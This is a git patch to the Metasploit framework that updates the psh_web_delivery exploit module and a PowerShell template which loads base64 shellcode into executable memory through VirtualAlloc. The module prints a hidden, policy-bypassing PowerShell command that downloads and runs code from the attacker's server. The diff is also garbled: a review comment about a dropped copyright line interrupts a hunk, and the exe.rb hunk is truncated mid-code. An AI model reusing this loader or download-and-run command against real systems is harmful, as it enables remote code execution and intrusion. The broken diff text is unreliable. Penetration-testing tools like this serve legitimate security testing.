From 0a2917685585f5ad2738dfc68896cb968576d8ff Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 16 Dec 2013 09:08:01 +0000 Subject: [PATCH] Update psh_web_delivery for reflection --- LICENSE | 6 +++++- .../scripts/to_mem_pshreflection.ps1.template | 5 +---- lib/msf/util/exe.rb | 13 ++++++++----- modules/exploits/windows/misc/psh_web_delivery.rb | 4 ++-- 4 files changed, 16 insertions(+), 12 deletions(-) diff --git a/LICENSE b/LICENSE index acb2f21eca..768247fb50 100644 --- a/LICENSE +++ b/LICENSE @@ -15,8 +15,12 @@ License: BSD-3-clause # Last updated: 2013-Nov-04 # +Files: data/templates/to_mem_pshreflection.ps1.template +Copyright: 2012, Matthew Graeber +License: BSD-3-clause + Files: data/john/* -Copyright: 1996-2011 Solar Designer. +Copyright: 1996-2011 License: GPL-2 Files: external/pcaprub/* diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template index c56e66cabe..92ac5dca7f 100644 --- a/data/templates/scripts/to_mem_pshreflection.ps1.template +++ b/data/templates/scripts/to_mem_pshreflection.ps1.template @@ -1,6 +1,3 @@ -#Added a tweaked by shellster -#Originally taken from https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 - function %{func_get_proc_address} { Param ($%{var_module}, $%{var_procedure}) $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 
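Review bot: The john entry in the LICENSE hunk loses its copyright holder: `-Copyright: 1996-2011 Solar Designer.` becomes `+Copyright: 1996-2011`, which looks like an accidental edit rather than an intended change, since the commit otherwise only adds the to_mem_pshreflection.ps1.template entry above it. Unless the attribution was meant to be removed, keep the line as `Copyright: 1996-2011 Solar Designer.` (or `Copyright: 1996-2011 Solar Designer` if only the trailing period was the target). Dropping a copyright holder from a license manifest is the kind of change that should be called out explicitly in the commit message if it is deliberate.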
@@ -21,7 +18,7 @@ function %{func_get_delegate_type} { return $%{var_type_builder}.CreateType() } -%{shellcode} +[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}") $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, [math]::max(0x1000, $%{var_code}.Length), 0x40) $%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32]))) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index e7fd88b376..f5855d2872 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -914,15 +914,17 @@ require 'msf/core/exe/segment_injector' hash_sub[:var_rwx] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_iter] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8) - hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code]) return read_replace_script_template("to_mem_old.ps1.template", hash_sub).gsub(/(? 'application/octet-stream' }) end @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote url = get_uri() download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))" print_status("Run the following command on the target machine:") - print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"") + print_line("powershell.exe -w hidden -nop -ep bypass -noe -c \"#{download_and_run}\"") end end